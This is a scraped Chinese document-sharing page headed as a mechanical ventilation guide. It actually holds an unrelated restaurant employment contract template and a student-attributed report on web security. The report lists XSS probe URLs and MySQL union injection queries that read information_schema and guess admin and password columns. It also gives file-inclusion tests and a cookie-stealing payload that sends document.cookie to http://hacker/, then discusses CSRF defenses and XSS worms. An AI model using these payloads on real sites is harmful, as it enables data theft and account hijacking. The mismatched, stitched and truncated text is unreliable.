機械通氣指南_第1頁
機械通氣指南_第2頁
機械通氣指南_第3頁
機械通氣指南_第4頁
機械通氣指南_第5頁
已閱讀5頁,還剩24頁未讀, 繼續(xù)免費閱讀

下載本文檔

版權說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權,請進行舉報或認領

文檔簡介

機械通氣指南餐飲員工聘用合同餐飲員工聘用合同

/餐飲員工聘用合同餐飲員工聘用合同甲方:??乙方:?甲方聘用乙方為正式員工,雙方經(jīng)過平等協(xié)商,彼此同意約定下述條款以共同遵守。?第一條本合同于________年_______月_______日生效,期限________年,其中試用期至______年_____月______日止。第二條:乙方的考勤與管理悉按甲方有關人事管理制度辦理。?第三條:乙方的職務或工種為:。乙方每周工作時間為________天,每天工作________小時;乙方應按照工作職責保證完成甲方規(guī)定的工作和任務。?第四條:乙方的工作職責、事項由甲方依乙方的職務或工種,并視乙方能力及甲方需要進行分派。第五條:甲方根據(jù)工作需要,要求乙方加班時,除不可抗拒的事由外,乙方應予配合,有關加班事宜,依員工手冊辦理。?第六條:乙方的工作報酬:(一)甲方應按月支付乙方報酬,乙方的工資待遇定為,并可享受甲方規(guī)定的津貼福利和獎勵。?(二)甲方可參考下列事項調(diào)整乙方職務等乙方每月工作考核記錄;乙方工作職務(或工種)變換情況;勞務市場供需狀況及社會經(jīng)濟發(fā)展一般水平。(三)甲方在以下情況有權扣除乙方相應額度的勞務報酬:因乙方的過失給甲方造成經(jīng)濟損失的;乙方違反公司管理制度的;雙方約定的其他情況。第七條未經(jīng)甲方許可,乙方不得承接與乙方職責相關的個人業(yè)務。?第八條:乙方每月工資由甲方于次月日發(fā)放。若工資發(fā)放日適逢周日或假日,甲方得提前或推后一日或數(shù)日發(fā)放。?第十條乙方有下列情形之一,甲方可以解除本合同:(一)在試用期間被證明不符合錄用條件的;(二)嚴重違反甲方有關規(guī)定及按照本合同約定可以解除勞務合同的;(三)嚴重失職,營私舞弊,對甲方利益造成重大損害的;(四)被依法追究刑事責任的。第十一條:甲方因業(yè)務萎縮時有權終止本合同,并提前一個月通知乙方。?第十二條:乙方主動提出解除本合同時,須提前一個月通知甲方,調(diào)離時,乙方須按員工手冊辦理有關手續(xù)。?第十三條:乙方聲明:乙方在簽署本合同時,業(yè)已獲得員工手冊,并知悉全文,愿意遵守各項規(guī)定。第十四條:本合同一式兩份,甲、乙雙方各執(zhí)一份,經(jīng)雙方簽章后于年月日起生效。第十五條:合同期滿如未續(xù)簽,則視為本合同自行終止,雙方應及時辦理相關手續(xù)。第十六條:經(jīng)甲乙雙方協(xié)商一致,本合同可以解除。?第十七條:甲乙雙方約定本合同增加以下內(nèi)容:(一)乙方有義務向甲方提供真實的個人信息與相關證明,并如實填寫《勞務人員登記表》,否則甲方有權隨時解除本合同,并且不給予經(jīng)濟補償。(二)甲方有權對公司的有關規(guī)定進行修改、完善。修改后的內(nèi)容對本合同具有同等效力(三)甲方可以在合同有效期內(nèi),根據(jù)需要調(diào)整乙方的崗位職責和工作范圍,勞務報酬等事項也將做出相應調(diào)整。乙方愿意服從甲方的安排。?第十八條:甲、乙雙方就履行本合同所發(fā)生一切爭執(zhí),同意以勞動局為第一審理機關。??甲方(簽字):乙方(簽字):?身份證號碼:?戶口所在地地址:?聯(lián)絡方式:

Web前端的認識和理解Web前端的認識和理解

/Web前端的認識和理解Web前端認識班級:0441104姓名:夏維;王波學號:2011211830;2011211832授課教師:董濤

對Web前端的認識由于網(wǎng)絡技術日趨成熟,黑客們也將注意力從以往對

網(wǎng)絡服務器

的攻擊逐步轉(zhuǎn)移到了對Web應用的攻擊上。根據(jù)Gartner的最新調(diào)查,信息安全攻擊有75%都是發(fā)生在Web應用而非網(wǎng)絡層面上。同時,數(shù)據(jù)也顯示,三分之二的Web站點都相當脆弱,易受攻擊。然而現(xiàn)實確是,絕大多數(shù)企業(yè)將大量的投資花費在網(wǎng)絡和服務器的安全上,沒有從真正意義上保證Web應用本身的安全,給黑客以可乘之機。一、Web的介紹web的起源Web是WorldWideWeb的簡稱,中文稱之為萬維網(wǎng),是用于發(fā)布、瀏覽、查詢信息的網(wǎng)絡信息服務系統(tǒng),由許多遍布在不同地域內(nèi)的Web服務器有機地組成Web架構的精妙處從技術層面上看,Web架構的精華有三處:用超文本技術(HTML)實現(xiàn)信息與信息的連接;用統(tǒng)一資源定位技術(URL)實現(xiàn)全球信息的精確定位;用新的應用層協(xié)議(HTTP)實現(xiàn)分布式的信息共享。Web技術涉及的技術Web是一種典型的分布式應用架構。Web應用中的每一次信息交換都要涉及到客戶端和服務端兩個層面。因此,Web開發(fā)技術大體上也可以被分為客戶端技術和服務端技術兩大類。(1)客戶端技術①HTML語言的誕生Web客戶端的主要任務是展現(xiàn)信息內(nèi)容,HTML語言是信息展現(xiàn)的最有效載體之一。作為一種實用的超文本語言,1990年,第一個圖形化的Web瀏覽器"WorldWideWeb"終于可以使用一種為Web度身定制的語言--HTML來展現(xiàn)超文本信息了。②從靜態(tài)信息到動態(tài)信息最初的HTML語言只能在瀏覽器中展現(xiàn)靜態(tài)的文本或圖像信息,隨后由靜態(tài)技術向動態(tài)技術逐步轉(zhuǎn)變。1997年,Microsoft發(fā)布了IE4.0,并將動態(tài)HTML標記、CSS和動態(tài)對象模型發(fā)展成了一套完整、實用、高效的客戶端開發(fā)技術體系,Microsoft稱其為DHTML。同樣是實現(xiàn)HTML頁面的動態(tài)效果,DHTML技術無需啟動Java虛擬機或其他腳本環(huán)境,可以在瀏覽器的支持下,獲得更好的展現(xiàn)效果和更高的執(zhí)行效率。為了在HTML頁面中實現(xiàn)音頻、視頻等更為復雜的多媒體應用,又引入了對QuickTime插件的支持。Realplayer插件、Microsoft自己的媒體播放插件MediaPlayer也被預裝到了各種Windows版本之中。隨后Flash插件的橫空出世。(2)服務端技術與客戶端技術從靜態(tài)向動態(tài)的演進過程類似,Web服務端的開發(fā)技術也是由靜態(tài)向動態(tài)逐漸發(fā)展、完善起來的。二、漏洞挖掘?漏洞挖掘技術一直是網(wǎng)絡攻擊者最感興趣的問題,漏洞挖掘的范圍也在隨著技術的提升而有所變化.在前期針對緩沖區(qū)溢出格式化字符串堆溢出lib庫溢出等技術都是針對ELF文件或者PE文件的漏洞挖掘技術.在針對ELF文件PE文件如strcpymemcpy等存在緩沖區(qū)溢出遺患的C函數(shù),所以通過審計源代碼的辦法來進行漏洞挖掘是一個可能性系數(shù)很小的漏洞挖掘技術,而針對軟件的黑盒子測試雖然也能找到一些軟件的漏洞,但可能性系數(shù)也會較小,在國外的一些進行漏洞挖掘的辦法已經(jīng)慢慢的提升為自己寫黑盒子測試代碼,然后針對系統(tǒng)或軟件的某個功能模塊進行模塊化的漏洞挖掘技術.例如Linux內(nèi)核的很多漏洞都是通過fuzzing技術找到的,fuzzing即模糊測試的意思,大家可以理解為類似SQL盲注入類型的攻擊技術.網(wǎng)絡安全的界限在不斷的提升,目前緩沖區(qū)溢出漏洞已經(jīng)如MSSQL注入般的被很多人堵死,而在進行網(wǎng)絡入侵滲透的過程中,很多人滲透成功的著力點都是通過WEB開始的,當然有些人是通過MSSQL注入,有些人通過其它的WEB漏洞技術一步步的走到了入侵成功的步驟.我們下面將會討論一些WEB漏洞挖掘的簡單技術,通過這些簡單技術的規(guī)則,然后配合經(jīng)驗的提高,大家或許會得到意想不到的效果.WEB漏洞的分類1、SQL注入??SQL注入漏洞,是依靠存在弱點的WEB腳本代碼,來實現(xiàn)通過瀏覽器執(zhí)行任意SQL語句,從而實現(xiàn)最終獲取某種權限的攻擊技術.SQL注入的關鍵部分在于對元數(shù)據(jù)的利用,所謂元數(shù)據(jù)即數(shù)據(jù)庫的基礎數(shù)據(jù).例如我們可以通過database()version()來獲得數(shù)據(jù)庫的名稱及版本,而我們通過SQL內(nèi)置函數(shù)獲得的這些內(nèi)容都屬于數(shù)據(jù)庫元數(shù)據(jù)的內(nèi)容.理解了元數(shù)據(jù)的概念,在后面的章節(jié)我會給大家簡單的講解下通過元數(shù)據(jù)來獲取MySQL的數(shù)據(jù)表.2、文件包含類型,如PHP的的遠程本地文件包含漏洞

??文件包含漏洞是PHP程序特有的一個弱點攻擊,原理就是在使用include時沒有安全的編程,而能夠找到文件包含漏洞則是入侵一個WEB系統(tǒng)的很重要的因素,有了文件包含漏洞則可以很快速的達到上傳WEBSHELL,然后本地提升權限的作用.3、XSS?XSS漏洞是被很多人遺忘的漏洞,但是XSS也是一個比較危險的安全隱患,我看到很多國內(nèi)介紹XSS漏洞的文章大部分在如何欺騙管理員獲得后臺登陸帳戶或者管理員的cookies文件.但這些僅僅是XSS漏洞的簡單用法,如果尋找到的XSS漏洞可以任意執(zhí)行任Javascript腳本,那安全性也是不容忽視的.通過Javascript腳本其實也可以做一些惡意的攻擊,甚至可以獲得一些WEB程序的源代碼,當然這個要看大家對Javascript腳本的熟悉程度.例如我們這幾天公布的這個可跨站執(zhí)行任意Javascript腳本的漏洞,最后我也通過這個漏洞給客戶演示了如何獲取他們的服務器信息,并最終實現(xiàn)得到其一定權限的方法.同時例如session騙cookies欺騙,目前我也把這些規(guī)入了XSS漏洞的范圍,當然僅僅研究這兩個技術也是很值得大家去深入的進行漏洞挖掘的.二、WEB漏洞挖掘規(guī)則漏洞挖掘規(guī)則需要一個WEB瀏覽器,如IEFirefox等即可,無需讀取WEB程序的源代碼,只要某個規(guī)則符合了漏洞規(guī)則的要求,即可以采取相關的漏洞攻擊技術進行相應的漏洞攻擊辦法例如:

http://website/index1.php?id=<script>alert

("111")</script>,如果對方的代碼過濾了"雙引號,那么可以通過

http://website/index1.php?id=<script>alert

('111')</script>,采用'單引號測試,若單引號也過濾呢?OK,我們這樣來測試

http://website/index1.php?id=<script>alert(111)</script

>,使用數(shù)字提交,這樣測試XSS的漏洞就擴展到了三條,通過構造HTML語句來實現(xiàn)XSS漏洞的挖掘等等.XSS的漏洞挖掘規(guī)則

http://website/index1.php?id=<script>alert("111")</script

>

http://website/index1.php?id=<script>alert

('111')</script>

http://website/index1.php?id=<script>alert

(111)</script>

http://website/index1.php?id=<body+onload=alert

("1111")>

http://website/index1.php?id=<body+onload=alert

('1111')>

http://website/index1.php?id=<body+onload=alert

(1111)>

http://website/index1.php?id=<img+src=http://OtherWebSite/x.gif+onload=alert

("1111")>

http://website/index1.php?id=<img+src=http://OtherWebSite/x.gif+onload=alert

('1111')>

http://website/index1.php?id=<img+src=http://OtherWebSite/x.gif+onload=alert

(1111)>

http://website/index1.php?id=<"

http://website/index1.php?id=<'

http://website/index1.php?id=<

http://website/index1.php?id=<!--

http://website/index1.php?id=-->

http://website/index1.php?id=<!--

?-->

使用上面的這些簡單漏洞規(guī)則,如果模糊測試一些站點的話,可以找到一些XSS漏洞。

下面的這四個語句判斷是否存在mysql注入,其中'號類型的測試已經(jīng)不是很可行,特別在PHP5和mysql5的環(huán)境下:)

http://website/index1.php?id=1'

?

http://website/index1.php?id=1

?and1=1

http://website/index1.php?id=1

?and1=2

http://website/index1.php?id=1

?orderby4//4為判斷該表的列數(shù),直到猜測到為止

下面的語句來獲取mysql的一些信息,這里我們假設我們使用orderby語句判斷出的列數(shù)為4

http://website/index1.php?id=1

?and1=1unionselect1,2,3,4

http://website/index1.php?id=1

?and1=1unionselectversion(),database(),user(),4

http://website/index1.php?id=1

?and1=1unionselect1/*

http://website/index1.php?id=1

?and1=1unionselectversion()/*

http://website/index1.php?id=1

?and1=1unionselectdatabse()/*

猜測表名:

http://website/index1.php?id=1

?and1=1unionselect1,2,3,4fromdatabase.tablewhere1=2

//where1=2不打印猜測表的內(nèi)容

adminuserarticlesnews必須在指定select的字段個數(shù)再使用,否則mysql會報錯.

http://website/index1.php?id=1

?and1=1unionselecttable_schema,table_name,table_rows,table_countfrominformation_schema.tables//上面使用數(shù)據(jù)庫的元數(shù)據(jù)來獲取mysql的信息,前提是系統(tǒng)管理員沒有禁止mysql普通用戶對元數(shù)據(jù)庫的表查詢,如果禁止了則該辦法是無效的.在開始分析mysql數(shù)據(jù)庫到底可以執(zhí)行到那種程度的注入情況下分析了mysql的系統(tǒng)架構,最終發(fā)現(xiàn)通過information_schema數(shù)據(jù)庫提供給mysql用戶的元數(shù)據(jù)可以得到一些mysql數(shù)據(jù)庫的基本信息,例如得到數(shù)據(jù)庫的各個表信息等,還可以得到數(shù)據(jù)庫的權限設置等信息,information_schema數(shù)據(jù)庫用到的表的具體字段

1:KEY_COLUMN_USAGE表constraint_schema:存放數(shù)據(jù)庫名table_schema:存放數(shù)據(jù)庫名table_name:存放數(shù)據(jù)庫表信息column_name:存放數(shù)據(jù)庫的字段信息,一般可以獲取第一個字段或者自增字段的信息2:SCHEMA表schema_name:存放數(shù)據(jù)庫名default_charater_set_name:存放charset類型default_collation_name:存放charset相關信息3:SCHEMA_PRIVILEGES表grantee:存放數(shù)據(jù)庫用戶名table_schema:表名privilege_type:權限4:STATISTICS表table_schema:存放數(shù)據(jù)庫名table_name:存放表名index_schema:數(shù)據(jù)庫名index_name:是否縮引column_name:存放索引自增字段5:TABLES表table_schema:存放數(shù)據(jù)庫名table_name:存放表名table_type:表類型SYSTEMorBASETABLEengin:MEMORYMYISAMInnoDBversion:table_rows:表的行數(shù)auto_increment:自增的總行數(shù)create_time:創(chuàng)建表的時間update_time:更新表的時間create_options:創(chuàng)建表時的約束條件

有了這些以后,如果對方系統(tǒng)管理員忽略了這些,則可以達到我們不需要猜測表名而直接獲取數(shù)據(jù)庫表名的結(jié)果.

猜測列名:

http://website/index1.php?id=1

?and1=1unionselectusername,2,3,4fromuserwhere1=2按照這個規(guī)則依次類推,如果我們猜測到user表存在username字段,則程序執(zhí)行是正常的,否則程序會出錯,也可以使用where1=1來打印表的信息,通過這樣的辦法就可以獲取mysql數(shù)據(jù)庫的某些關鍵表的字段信息,如:admin與password:)C:文件包含漏洞

??文件包含漏洞的測試,有以下幾個比較簡單且有效的辦法.1:新建一個簡單的php代碼,如:<?phpinfo();?>,保存為*.txt格式2:新建一個簡單的php代碼,如:<?phpinfo();?>,保存為無后綴格式然后我們測試時只需要采取下面簡單的辦法即可,這里我們假設我們下面的文件URL為

/include.txt

/include

漏洞規(guī)則

http://website/file.php?inc=/include.txt

http://website/file.php?inc=/include.txt

http://website/file.php?inc=/include

http://website/file.php?inc=/include

使用上面的簡單規(guī)則即可實現(xiàn)文件包含漏洞的測試,當然得根據(jù)具體的返回信息來判斷.例如從XSS漏洞的檢測規(guī)則可能會發(fā)現(xiàn)包含文件漏洞,如果知道PHP的某個函數(shù)存在緩沖區(qū)溢出,我們假設這個PHP的內(nèi)置函數(shù)為phphtml(char*str),假設

http://website/file.php?inc=test

,這里的參數(shù)inc經(jīng)過PHP代碼時使用了phphtml內(nèi)置函數(shù),則可以使用下面的辦法來觸發(fā)漏洞

(n為觸發(fā)漏洞的最大字符數(shù))當然類似這樣的漏洞是需要寫程序來自動運行的,然后來觸發(fā)溢出并執(zhí)行shellcode.但這里也存在一個問題,即一般情況下,類似PHP本身的溢出漏洞的利用是有些難度存在的.三:XSS的概述最重要的要了解XSS漏洞的是,他們是目前為止發(fā)現(xiàn)的,在所有網(wǎng)站超過80%比例的定制Web應用程序中最常見的漏洞。雖然跨站點腳本在一段時間內(nèi)一直被認為是中等程度的的漏洞,但XSS蠕蟲和病毒的出現(xiàn),已經(jīng)提高了XSS的評估。軟件開發(fā)人員和安全專業(yè)人員需要知道它是多么簡單,以防止代碼開發(fā)過程中出現(xiàn)XSS漏洞,并且一經(jīng)查出,他們是多么容易解決。XSS是一種攻擊技術,它使得一個網(wǎng)站,寫出攻擊者提供的可執(zhí)行代碼,然后加載在用戶的Web瀏覽器。也就是說,當黑客使用存在漏洞的網(wǎng)站作為攻擊的通道時,用戶是預定的受害者。1、非持久性xss想想看,一個黑客想使用“http://victim/”網(wǎng)站對用戶進行XSS攻擊。黑客會采取的第一個步驟是在http://victim/找出一個XSS漏洞,然后構造一個特制的URL,也被稱為鏈接。要做到這一點,黑客會搜尋網(wǎng)站上的客戶端提供的數(shù)據(jù)可以被發(fā)送到Web服務器,然后回顯到屏幕上的任何功能,比如搜索框。常見的在線發(fā)布的博客。XSS漏洞往往出現(xiàn)在搜索框表單。在搜索字段中輸入“testsearch”,響應頁面將用戶輸入的文本在顯示在三個不同的位置,查詢字符串中包含值為“test+search”的“search”參數(shù)。這個URL值可以在運行時更改,甚至包括HTML/JavaScript的內(nèi)容。http://victim/,http://victim/search.pl?search=test+search其3展示了原來的搜索詞被替換為下面的HTML/JavaScript代碼時會發(fā)生什么:Example1.”><SCRIPT>alert(‘XSS%20Testing’)</SCRIPT>結(jié)果頁面彈出了一個無害的警告對話框。根據(jù)提示,提交的代碼已經(jīng)成為web頁面的一部分,證明了JavaScript已進入到http://victim/的上下文并得到執(zhí)行。其4展示了夾雜有新的HTML/JavaScript代碼的Web頁面的HTML源代碼。其3,原來的搜索詞將被替換為HTML/JavaScript代碼。其4,夾雜有新的HTML/JavaScript代碼的Web頁面的HTML源代碼。此時,黑客將會繼續(xù)修改這個URL,包含更復雜的XSS攻擊來利用用戶。一個典型的例子是一個簡單的cookie盜竊的攻擊。Example2.“><SCRIPT>var+img=new+Image();img.src=”http://hacker/”%20+%20document.cookie;</SCRIPT>前面的JavaScript代碼創(chuàng)建一個圖像DOM(文檔對象模型)對象。varimg=newImage();因為JavaScript代碼在“http://victim/”上下文中執(zhí)行,所以它可以訪問cookie數(shù)據(jù)。document.cookie;圖形對象然后指派一個外域的URL發(fā)送帶有Web瀏覽器的Cookie字符串的數(shù)據(jù)到“http://hacker/”。img.src=”http://hacker/”+document.cookie;下面是一個例子,是一個被發(fā)送的HTTP請求。Example3.GEThttp://hacker/path/_web_browser_cookie_dataHTTP/1.1Host:hostContent-length:0一旦黑客完成了他的攻擊代碼,他會通過垃圾郵件,留言板的帖子,即時消息和其他方法宣傳這種特制的鏈接,試圖吸引用戶點擊。是什么讓這種攻擊這么有效?用戶可能點擊正常的網(wǎng)絡釣魚郵件7中的鏈接是因為這個URL包含了真正的網(wǎng)站域名,而不是一種外觀相似的域名或隨機的IP地址。應當注意的是,過長的XSS鏈接可以使用URL縮短服務,如TinyURL.com進行偽裝。2、持久型XSS持久型XSS攻擊最常發(fā)生在由社區(qū)內(nèi)容驅(qū)動的網(wǎng)站或Web郵件網(wǎng)站,不需要特制的鏈接來執(zhí)行。黑客僅僅需要提交XSS漏洞利用代碼到一個網(wǎng)站上其他用戶可能訪問的地方。這些地區(qū)可能是博客評論,用戶評論,留言板,聊天室,HTML電子郵件,wikis,和其他的許多地方。一旦用戶訪問受感染的網(wǎng)頁,執(zhí)行是自動的。這使得持續(xù)性的XSS的危險性比非持久性高,因為用戶沒有辦法保護自己。一旦黑客成功在某個頁面注入了漏洞利用代碼,他將宣傳受感染頁面的URL來希望不知情的用戶中招。即使用戶對非持續(xù)性XSS的URL懂得識別,也會很容易的受到影響。無論使用非持續(xù)性或持續(xù)性的XSS漏洞,黑客可以利用用戶,導致網(wǎng)絡和財務上的損失,有許多的方法。2、傳播的方法對于一個病毒或蠕蟲想要成功,它需要一個執(zhí)行和傳播的方法。電子郵件病毒通常在鼠標點擊后執(zhí)行,然后通過您的聯(lián)系人列表來發(fā)送帶有惡意軟件的的郵件進行傳播。網(wǎng)絡蠕蟲利用遠程利用漏洞危害機器和并且通過連接到其他存在漏洞的主機進行傳播。除傳播之外,蠕蟲病毒還是高度多樣化,包括創(chuàng)造DDoS僵尸網(wǎng)絡,垃圾郵件僵尸,或遠程鍵盤監(jiān)控的能力。XSS蠕蟲與其他形式的惡意軟件相似,但以自己獨特的方式執(zhí)行和傳播。使用一個網(wǎng)站來存放惡意代碼,XSS蠕蟲和病毒通過控制Web瀏覽器,使得它復制惡意軟件到網(wǎng)絡上的其他地方去感染別人來進行傳播。例如,一個含有惡意軟件的博客評論,可以使用訪問者的瀏覽器發(fā)布額外的感染性的博客評論。XSS蠕蟲病毒可能會使得瀏覽器進行發(fā)送電子郵件,轉(zhuǎn)賬,刪除/修改數(shù)據(jù),入侵其他網(wǎng)站,下載非法內(nèi)容,以及許多其他形式的惡意活動。用最簡單的方式去理解,就是如果沒有適當?shù)姆烙?,在網(wǎng)站上的任何功能都可以在未經(jīng)用戶許可的情況下運行。在最后一節(jié)中,我們將重點放在XSS漏洞本身,以及用戶可以怎么樣被利用。現(xiàn)在,我們來看XSS惡意軟件是如何可以進行遠程通信。XSS漏洞利用代碼,通常是HTML/JavaScript,使用三種方式使得瀏覽器發(fā)送遠程HTTP請求的瀏覽器:嵌入式的HTML標簽,JavaScriptDOM的對象,XMLHTTPRequest。3、嵌入式HTML標簽一些HTML標簽具有在頁面加載時會自動發(fā)起Web瀏覽器的HTTP請求的屬性。有一個例子是IMG的SRC屬性。SRC屬性用于指定在Web頁面中顯示的圖像文件的URL地址。當你的瀏覽器載入帶有IMG標簽的網(wǎng)頁,圖像會自動被請求,并在瀏覽器中顯示。但是,SRC屬性也可以被用于任何Web服務器的其他URL,不僅僅是包含圖像的。例如,如果我們進行了谷歌搜索“WhiteHatSecurity”我們最終得到了下面的URL:這個URL可以很容易地取代IMG內(nèi)的SRC屬性的值,從而迫使您的Web瀏覽器中執(zhí)行相同的谷歌搜索。<img顯然使得Web瀏覽器發(fā)送一個谷歌搜索請求是沒有什么危害性的。然而,URL構建的同樣的過程可以用來使得Web瀏覽器自動進行銀行賬戶資金的匯款,發(fā)表煽動性言論,甚至入侵網(wǎng)站。這一點可以說明,這是一個迫使一個Web瀏覽器連接到其他網(wǎng)站,使的XSS蠕蟲病毒傳播的機制。5、JavaScript和文檔對象模型JavaScript被用于給網(wǎng)站訪問者一個豐富的、交互式的體驗。這些網(wǎng)頁更接近于一個軟件應用程序,而不是一個靜態(tài)的HTML文檔。我們常會看到JavaScript被用于進行圖像的翻轉(zhuǎn),動態(tài)表單輸入檢查,彈出對話框,下拉菜單,拖動和拖放等。JavaScript有接近完全的對網(wǎng)站上的每一個對象,包括圖像,cookies,窗口,框架和文本內(nèi)容的訪問。這些對象中的每一個都是文檔對象模型的一部分。DOM提供了一系列JavaScript讀取和操作的應用程序編程接口。類似嵌入式HTML標簽的功能,JavaScript可以操縱DOM對象自動發(fā)起Web瀏覽器的HTTP請求。圖像和窗口的源URL可以被重新指定為其他URL的。我們可以使用JavaScript來改變圖像的DOM對象SRC進行谷歌搜索“WhiteHatSecurity”。img[0].src迫使Web瀏覽器連接到其他網(wǎng)站發(fā)送一個谷歌搜索請求是一種無害的例子。但這也說明了XSS惡意軟件傳播的另一種方法。四、HTML5安全五種可能會利用HTML5的功能進行攻擊的方法:1、表單篡改:另一個新功能讓攻擊者可以在被注入JavaScript的網(wǎng)站(例如XSS攻擊)中更改該網(wǎng)頁上的表單行為。舉例來說,攻擊者可以改變一個網(wǎng)絡商店的正常行為,不是將內(nèi)容送到購買或是登錄頁面,而是將用戶的身分認證信息發(fā)送到攻擊者自己的網(wǎng)站。2、利用地理定位追蹤受害者:地理定位是HTML5新功能中最受注目的一個。因為安全和隱私的考慮,網(wǎng)站必須先得到用戶的批準,隨后才能獲得位置訊息。然而就和以前出現(xiàn)過的其他功能一樣,例如Vista的用戶帳戶控制,Android的應用程序權限,還有無效的HTTPS憑證等,這些需要用戶作決定的安全措施幾乎沒有任何效果。而一旦有了授權,網(wǎng)站不僅可以知道受害者的位置,而且還可以在用戶移動時對其進行實時追蹤。3、利用桌面通知做社會工程學攻擊:我們在HTML5的五大優(yōu)秀功能文章中曾經(jīng)提到過HTML5的一個新功能:桌面通知。這些出現(xiàn)在

瀏覽器

之外的彈出窗口,其實是可以用HTML程序代碼進行定制的。雖然這種功能帶來了很不錯的交互方式,但也可能導致社會工程學攻擊,例如網(wǎng)絡釣魚或者假冒

殺毒

軟件等。看看下面的圖片就可以想象到,攻擊者可以如何利用這個新功能了。4、利用跨域請求或WebSockets的端口掃描:有了HTML5,瀏覽器現(xiàn)在可以連到任何IP地址或網(wǎng)站的(幾乎)任何端口。雖然除非目標網(wǎng)站有特別的允許,不然并不能接收到來自任意端口連接的回應,但是研究人員表示,這類請求所花的時間可以用來判斷目標端口是打開的還是關閉的。因此攻擊者就可以直接利用瀏覽器對受害者的內(nèi)部網(wǎng)絡進行端口掃描。5、點擊劫持更加容易:點擊劫持本身不是種新的攻擊,這種攻擊的目的是竊取受害者的鼠標按鈕點擊,然后將點擊定向到攻擊者所指定的其他頁面。攻擊者的目的是讓用戶在不知情的情況下點擊隱藏的鏈接。目前,對于點擊劫持最好的服務器端防御措施之一是被稱為Framekilling的技術。本質(zhì)上來說,受到影響的網(wǎng)站可以利用

Java

Script來驗證自己是否在一個iframe中運行,如果是的話,就拒絕顯示頁面內(nèi)容。這種技術已經(jīng)被在用在Facebook、Gmail和其他一些網(wǎng)站中。但是HTML5在iframe中增加了一個新的沙盒屬性,該屬性會讓網(wǎng)站停止執(zhí)行

JavaScript

腳本。在大多數(shù)情況下,這其實是比較安全的做法,但也存在缺點,就是會抵消目前對點擊劫持最好的防御措施。五、CSRFCSRF是跨站請求偽造,也被稱為“oneclickattack”或者sessionriding,通??s寫為CSRF或者XSRF,是一種對網(wǎng)站的惡意利用。盡管聽起來像跨站

腳本

,但它與XSS非常不同,并且攻擊方式幾乎相左。XSS利用站點內(nèi)的信任用戶,而CSRF則通過偽裝來自受信任用戶的請求來利用受信任的網(wǎng)站。與XSS攻擊相比,CSRF攻擊往往不大流行和難以防范,所以被認為比XSS更具危險性。即在某個惡意站點的頁面上,促使訪問者請求你的網(wǎng)站的某個URL,從而達到改變服務器端數(shù)據(jù)的目的。這一類攻擊依賴于你的網(wǎng)頁中的表單,脆弱的表單很容易受到攻擊。對于你網(wǎng)站中的訪問者而言,可能會受到以下攻擊:在你的網(wǎng)站之外記錄受攻擊者的日志(比如:Slashdot);修改受攻擊者在你的網(wǎng)站的設置(比如:Google);修改你的硬件防火墻;使用受攻擊者的登錄信息在你的網(wǎng)站中發(fā)表評論或留言;將資金轉(zhuǎn)移到另一個用戶帳號中。CSRF攻擊的典型是那些使用cookie記錄登錄信息的網(wǎng)站,但對于一些允許某個IP地址訪問的頁面(如內(nèi)部網(wǎng)),這一類攻擊也會奏效。CSRF攻擊通常會使用到JavaScript(但不僅限于JavaScript)實現(xiàn)跨站點自動提交表單--表單數(shù)據(jù)可以隱藏,提交按鈕可以偽裝成鏈接或滾動條。確定那些接受可改變服務器數(shù)據(jù)的CGI只接受POST參數(shù),不接受GET參數(shù),一些服務器端語言默認同時接受兩種方式提交過來的參數(shù);確定表單提交處理的是你自己的表單,可以使用一個隱藏字段中存放MD5字符串,此字符串是將登錄cookie數(shù)據(jù)與服務器端存放的密鑰進行MD5之后的結(jié)果,只有這個MD5字符串正確時才接受表單數(shù)據(jù);另外還可以增加一個更為嚴格的方法:在表單中增加一個時間戳的隱藏字段,并將其包含到hash字符串中,如果時間戳超過某個時間,則認為表單已過期。當表單過期時,給出一個方法可以讓用戶重新提交表單,比如將用戶之前填寫的數(shù)據(jù)依舊放入表單中,但使用一個新的hash字符串。一個PHP的表單例子,表單代碼:<?php$key=y8s4Z7m2;//MD5加密密鑰$time=time();//當前時間$hash=md5($time.$key);//hash字符串?<formmethod="post"action="comment.php"<pYourname:<inputtype="text"name="person_name"/</p<pComment:/<textareaname="comment"rows="10"cols="60"</textarea</p<inputtype="hidden"name="time"value="<?phpecho$time;?"/<inputtype="hidden"name="hash"value="<?phpecho$hash;?"/<p<inputtype="submit"name="comment"value="SubmitComment"/</p</form表單提交之后的comment.php后臺處理程序代碼:<?php$key=y8s4Z7m2;//密鑰,與上面的一致$expire=1800;//表單過期時間:半小時$my_hash=md5($_POST[time].$key);//正確的hash字符串if($my_hash!=$_POST[hash])//hash字符串不正確die(非法表單提交。);if(time()-$_POST[time]$expire){//表單已經(jīng)過期,生成新的時間戳和hash字符串,顯示表單讓用戶重新提交。(此處省略)//….}//表單驗證通過,可以接受表單提交的數(shù)據(jù),并進行其它操作。六、Web蠕蟲Web蠕蟲主要包括:XSS蠕蟲、CSRF蠕蟲、Clickjacking蠕蟲,這三類蠕蟲都與具體的漏洞風險有關系,從名字上很好分。還有第四類文本蠕蟲。蠕蟲性質(zhì):傳播性,病毒性為。什么是xss蠕蟲蠕蟲病毒,比如前幾年比較猖獗的熊貓燒香,還有最近Conficker蠕蟲。這些蠕蟲的特性都是具有自傳播,感染,變形等。最近流行的豬流感按照理論也算蠕蟲病毒。而近年來由于ajax流行,web2.0的一些特性,使得web蠕蟲流行。任何一個蠕蟲都不無原緣無故發(fā)作的,比如熊貓燒香是利用掛馬,遠程掃描等方式感染的,而這歸根結(jié)底還是系統(tǒng)有漏洞。那么web蠕蟲的切入點就是web有漏洞了。從03年腳本入侵流行一來,sql注射就是最流行的入侵方式,但是由于現(xiàn)在人們的安全意識的提高,sql漏洞越來越少,xss的漏洞就開始凸顯出來,而xss可以使我們嵌入任意我們需要的代碼,比如盜個cookie等,當別人訪問的時候會吧自己的發(fā)送到你指定的文件里去。一個xss蠕蟲都有什么基本功能之前在說熊貓燒香之類的蠕蟲病毒已經(jīng)說過了這個內(nèi)容,傳播感染和變形,而現(xiàn)在web蠕蟲先不用發(fā)展那么高級,而我們只需要寫出傳播和感染就行,至于變形,除非漏洞被過濾了我們還需要繞過那么就需要一定得變形,而這種變形一般不會影響我們寫的蠕蟲文件,會影響到調(diào)用蠕蟲文件的代碼。CSRF蠕蟲原理與XSS蠕蟲基本類似,只是這里用到的是CSRF,攻擊代碼存在于攻擊者的頁面中,目標網(wǎng)站傳播的內(nèi)容都包含攻擊者頁面URL,這樣才能有貨目標網(wǎng)站上的被攻擊者打開攻擊者頁面,然后出發(fā)CSRF,CSRF會據(jù)需跨域發(fā)布含攻擊者頁面URL的內(